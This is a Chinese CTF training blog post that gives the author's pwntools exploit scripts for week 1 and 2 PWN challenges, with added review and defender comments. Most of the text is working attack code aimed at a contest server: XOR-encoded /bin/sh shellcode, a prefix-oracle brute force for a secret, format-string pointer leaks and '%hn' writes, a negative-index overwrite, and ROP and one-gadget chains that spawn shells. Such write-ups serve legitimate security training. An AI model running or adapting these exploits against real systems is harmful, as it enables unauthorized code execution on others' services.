去年也是这时候,记得是校赛后Lilac学长让我们做的训练题,不过去年只做web,今年只看了PWN
week 4不一定有时间抢pwn一血了,所以把一些脚本先放了
(为什么平台没有密码找回功能,我也没私聊管理,week1后账号没了,换小号上)
第一周:Kirin-say,二三周:梅零落
PWN题:
week1:一血:2,二血:1
week2:一血:1,二血:2
week3:一血:2,二血:1,三血:1
前3 week总体很简单,都是20 mins内能解决的题目(不过周五真心事多)
week 1
1
# Week 1, challenge 1 ("babysc"): XOR-obfuscates a fixed byte string and sends it
# as one line.  Python 2 / pwntools-era script (print statement, str == bytes).
from pwn import *
# NOTE(review): the local process() handle is immediately replaced by the remote()
# handle on the next line, so the local-test path is dead code; comment one out.
p=process("./babysc")
p=remote("118.24.3.214",10000)
# Raw machine-code byte string; the text "//bin/sh" is visible inside it (the
# challenge name suggests shellcode -- not verifiable from this page alone).
s="\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
#s="aaaaaaaaaaaaaaaaa"
# Each byte is XORed with its 1-based position (byte i ^ (i+1)); presumably the
# service applies the same XOR before using the input -- confirm against the binary.
payload=""
for i in range(len(s)):
    payload+=chr(ord(s[i])^(i+1))
print payload   # Python 2 print statement
p.sendline(payload)
p.interactive()
2
# Week 1, challenge 2: the whole "script" is a filler string of repeated "a" bytes;
# how it was delivered (which input, which tool) is not shown on this page.
payload="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
3
# -*- coding: utf-8 -*-
# Week 1, challenge 3 ("CSTW"): recovers a 32-character secret one byte at a time.
# Each candidate prefix is sent to the service and the reply is checked for a
# marker string; the reply differing for a correct prefix is what makes this work.
# Defender's note: the service evidently compares the input prefix by prefix and
# answers differently on a partial match -- a whole-string, constant-time comparison
# with a single uniform response would remove this oracle.
from pwn import *
#context.log_level="debug"
flag=""     # characters recovered so far
ans=""      # candidate input (reassigned inside the inner loop before use)
# One outer pass per character position; a fresh connection is opened each time.
for i in range(32):
    p=remote("118.24.3.214",10001)
    #p=process("./CSTW")
    p.send("\n\n\n\n\n")    # answers five prompts -- assumed from the protocol, not shown here
    # p.recvuntil("——\n")
    # Try every byte value 32..255 as the next character (0..31 are never tried).
    for k in range(32,256):
        p.recvuntil("——\n")
        ans=flag+chr(k)+"\x00"    # known prefix + candidate + NUL terminator
        p.send(ans)
        s=p.recvuntil("\n")
        #print s
        # The marker appears in the reply only when the prefix including the
        # candidate matches; keep the byte, drop the connection, move to the next slot.
        if "..勇者Ch1p" in s:
            flag+=chr(k)
            print flag
            p.close()
            break
    # NOTE(review): if no candidate matched, the connection is left open and the
    # next pass repeats the same position with an unchanged flag.
print flag
4
# Week 1, challenge 4 ("Steins;Gate"): scripted dialogue with the service.  Two
# replies are parsed as hexadecimal pointers (the service echoes the inputs
# "%7$p" / "%11$p" expanded as printf-style conversions), then a final message
# built from fixed 8-byte constants is sent.
# Defender's note: user input reaching a printf-style format argument is what lets
# "%7$p" print a pointer; passing the input as a "%s" argument instead closes that.
from pwn import *
p=remote("118.24.3.214",10002)
#p=process("./Steins;Gate")
p.sendlineafter("ID:","/bin/sh\x00kirin")   # name field, NUL embedded in the middle
p.sendafter("world.\n","a"*48+"3#")
p.sendafter("man.\n","%7$p")     # reply contains a pointer printed by the service
#gdb.attach(p)
s=p.recvuntil("00")
s=int(s[:-2],16)   # drop the "00" delimiter before parsing (int() accepts the 0x prefix)
print hex(s+0x1234)
#gdb.attach(p)
p.sendafter("?\n","ff\x00\x00"*12+p32(s+0x1234))   # 0x1234 offset: meaning not given on this page
p.sendafter("debts.\n","%11$p")
# NOTE(review): unlike the first leak, the "00" delimiter is NOT stripped here, so
# the parsed value includes it -- presumably the pointer itself ends in 00; verify.
s=int(p.recvuntil("00"),16)
print hex(s)
#gdb.attach(p)
# 0x400c73 / 0x602040 / 0x400a76 are fixed program addresses (binary presumably not
# position-independent); their roles are not documented on this page.
p.sendafter("To seek the truth of the world.\n","a"*48+"3#\x00\x00"*2+p64(s)+"a"*8+p64(0x400c73)+p64(0x602040)+p64(0x400a76))
p.interactive()
week 2
1
# Week 2, challenge 1 ("CSTW2"): answers five prompts with an empty line, then at
# the ">" prompt sends the index "-9" followed by an 8-byte little-endian constant.
# Defender's note: a negative index being accepted suggests the service checks only
# an upper bound on a user-supplied index -- reject index < 0 as well (inferred).
from pwn import *
p=remote("118.24.3.214",11000)
#p=process("./CSTW2")
for i in range(5):
    p.recvuntil("\n")
    p.send("\n")
# Indentation was lost in the paste; this line is assumed to follow the loop -- confirm.
p.recvuntil(">")
#gdb.attach(p)
p.sendline("-9")
p.sendlineafter(">",p64(0x40096a))   # 0x40096a: fixed program address, role not given here
p.interactive()
2
# Week 2, challenge 2: the week-1 "Steins;Gate" dialogue run twice over one
# connection, wrapped in a retry loop.  The second pass parses a "%3$p" reply and
# rebases it with hard-coded constants (see the note on that line).
from pwn import *
context.log_level="debug"   # pwntools prints every byte sent and received
# Retry until one pass completes without raising.
while True:
    try:
        p=remote("118.24.3.214",11003)
        p.sendlineafter("ID:","/bin/sh\x00kirin")
        p.sendafter("world.\n","a"*48+"3#")
        p.sendafter("man.\n","%7$p")
        #gdb.attach(p)
        s=p.recvuntil("Y")
        s=int(s[:-9],16)    # strip the 9 bytes of text that follow the hex value
        print hex(s+0x1234)
        #gdb.attach(p)
        p.sendafter("?\n","ff\x00\x00"*12+p32(s+0x1234))
        p.sendafter("debts.\n","%11$p")
        s=int(p.recvuntil("00"),16)   # "00" delimiter is kept in the parsed value (cf. week 1)
        print hex(s)
        #gdb.attach(p)
        # Ends with a 2-byte value ("\xdb\x0d"), not a p64, so only the low 16 bits
        # of that slot are replaced; the script then expects the "ID:" prompt again --
        # why is not documented here.
        p.sendafter("To seek the truth of the world.\n","ff\x00\x00"*12+"3#\x00\x00"*2+p64(s)+"a"*8+"\xdb\x0d")
        #gdb.attach(p)
        # Second pass over the same dialogue on the same connection.
        p.sendlineafter("ID:","/bin/sh\x00kirin")
        p.sendafter("world.\n","a"*48+"3#")
        p.sendafter("man.\n","%7$p")
        #gdb.attach(p)
        s2=p.recvuntil("Y")
        s2=int(s2[:-9],16)
        print hex(s2+0x1234)
        #gdb.attach(p)
        p.sendafter("?\n","ff\x00\x00"*12+p32(s2+0x1234))
        p.sendafter("debts.\n","%3$p")
        # NOTE(review): the subtraction uses two addresses captured from one specific
        # run (0x7f0a1bc1e260 - 0x7f0a1bb27000) plus 0x45216; these offsets are only
        # valid for the library build they were measured on.
        s1=int(p.recvuntil("W")[:-2],16)-(0x7f0a1bc1e260-0x7f0a1bb27000)+0x45216
        print hex(s1)
        #gdb.attach(p)
        p.sendafter("To seek the truth of the world.\n","\x00\x00\x00\x00"*12+"3#\x00\x00"*2+p64(s)+"a"*8+p64(s1)+p64(0)*6)
        #gdb.attach(p)
        p.interactive()
        break
    # NOTE(review): a bare except also catches KeyboardInterrupt and SystemExit under
    # Python 2, so Ctrl-C cannot stop the loop and a permanently failing target is
    # retried forever; use `except Exception:` and close p before retrying (the
    # connection from a failed attempt is currently leaked).
    except:
        print "kirin"   # retry marker
3
# Week 2, challenge 3 ("handsomeariis"): two rounds of the "Repeat me!" prompt.
# The first reply yields 6 raw bytes that are widened to a 64-bit value; a
# constant adjustment is applied and the result is sent in the second round.
from pwn import *
p=remote("118.24.3.214",11002)
#p=process("./handsomeariis")
#gdb.attach(p)
# 20-byte text + 20 NUL bytes of padding, then four fixed 8-byte program addresses
# (0x400873, 0x601018, 0x400590, 0x400735); their roles are not given on this page.
p.sendlineafter("Repeat me!\n","Aris so handsoooome!"+"\x00"*20+p64(0x0400873)+p64(0x601018)+p64(0x400590)+p64(0x400735))
p.recvuntil("Great! Power upupuppp!\n")
# Pad the 6 received bytes to 8 for u64 (little-endian); the two constants are
# presumably offsets within one shared-library build -- only valid for that build.
s=u64(p.recv(6)+"\x00\x00")-0x06f690+0xf02a4
p.sendlineafter("Repeat me!\n","Aris so handsoooome!"+"\x00"*20+p64(s))
p.interactive()
4
# Week 2, challenge 4 ("babyfmtt"): one message is sent after the "PWN\n" banner.
# Defender's note: "%2126c%8$hn" is a printf-style conversion sequence -- it only
# has an effect if the service passes the received text as the format argument;
# a fixed format with the input as a "%s" argument makes such input inert.
from pwn import *
#p=process("./babyfmtt")
p=remote("118.24.3.214",11001)
#400e84
# "%2126c" pads the output to 2126 characters and "%8$hn" then stores the running
# count (0x84e) as a 16-bit value through the 8th argument; presumably the
# p64(0x601020) value is what lands in that argument slot -- not verifiable here.
# NOTE(review): the "#400e84" note above does not match the 0x84e count; presumably
# a leftover from an earlier attempt -- confirm.
payload1="%2126c%8$hnkirin"+p64(0x601020)+p64(0xffffffffffffffff)*12
#gdb.attach(p)
p.sendlineafter("PWN\n",payload1)
p.interactive()
week 3
【周五晚or周六更新】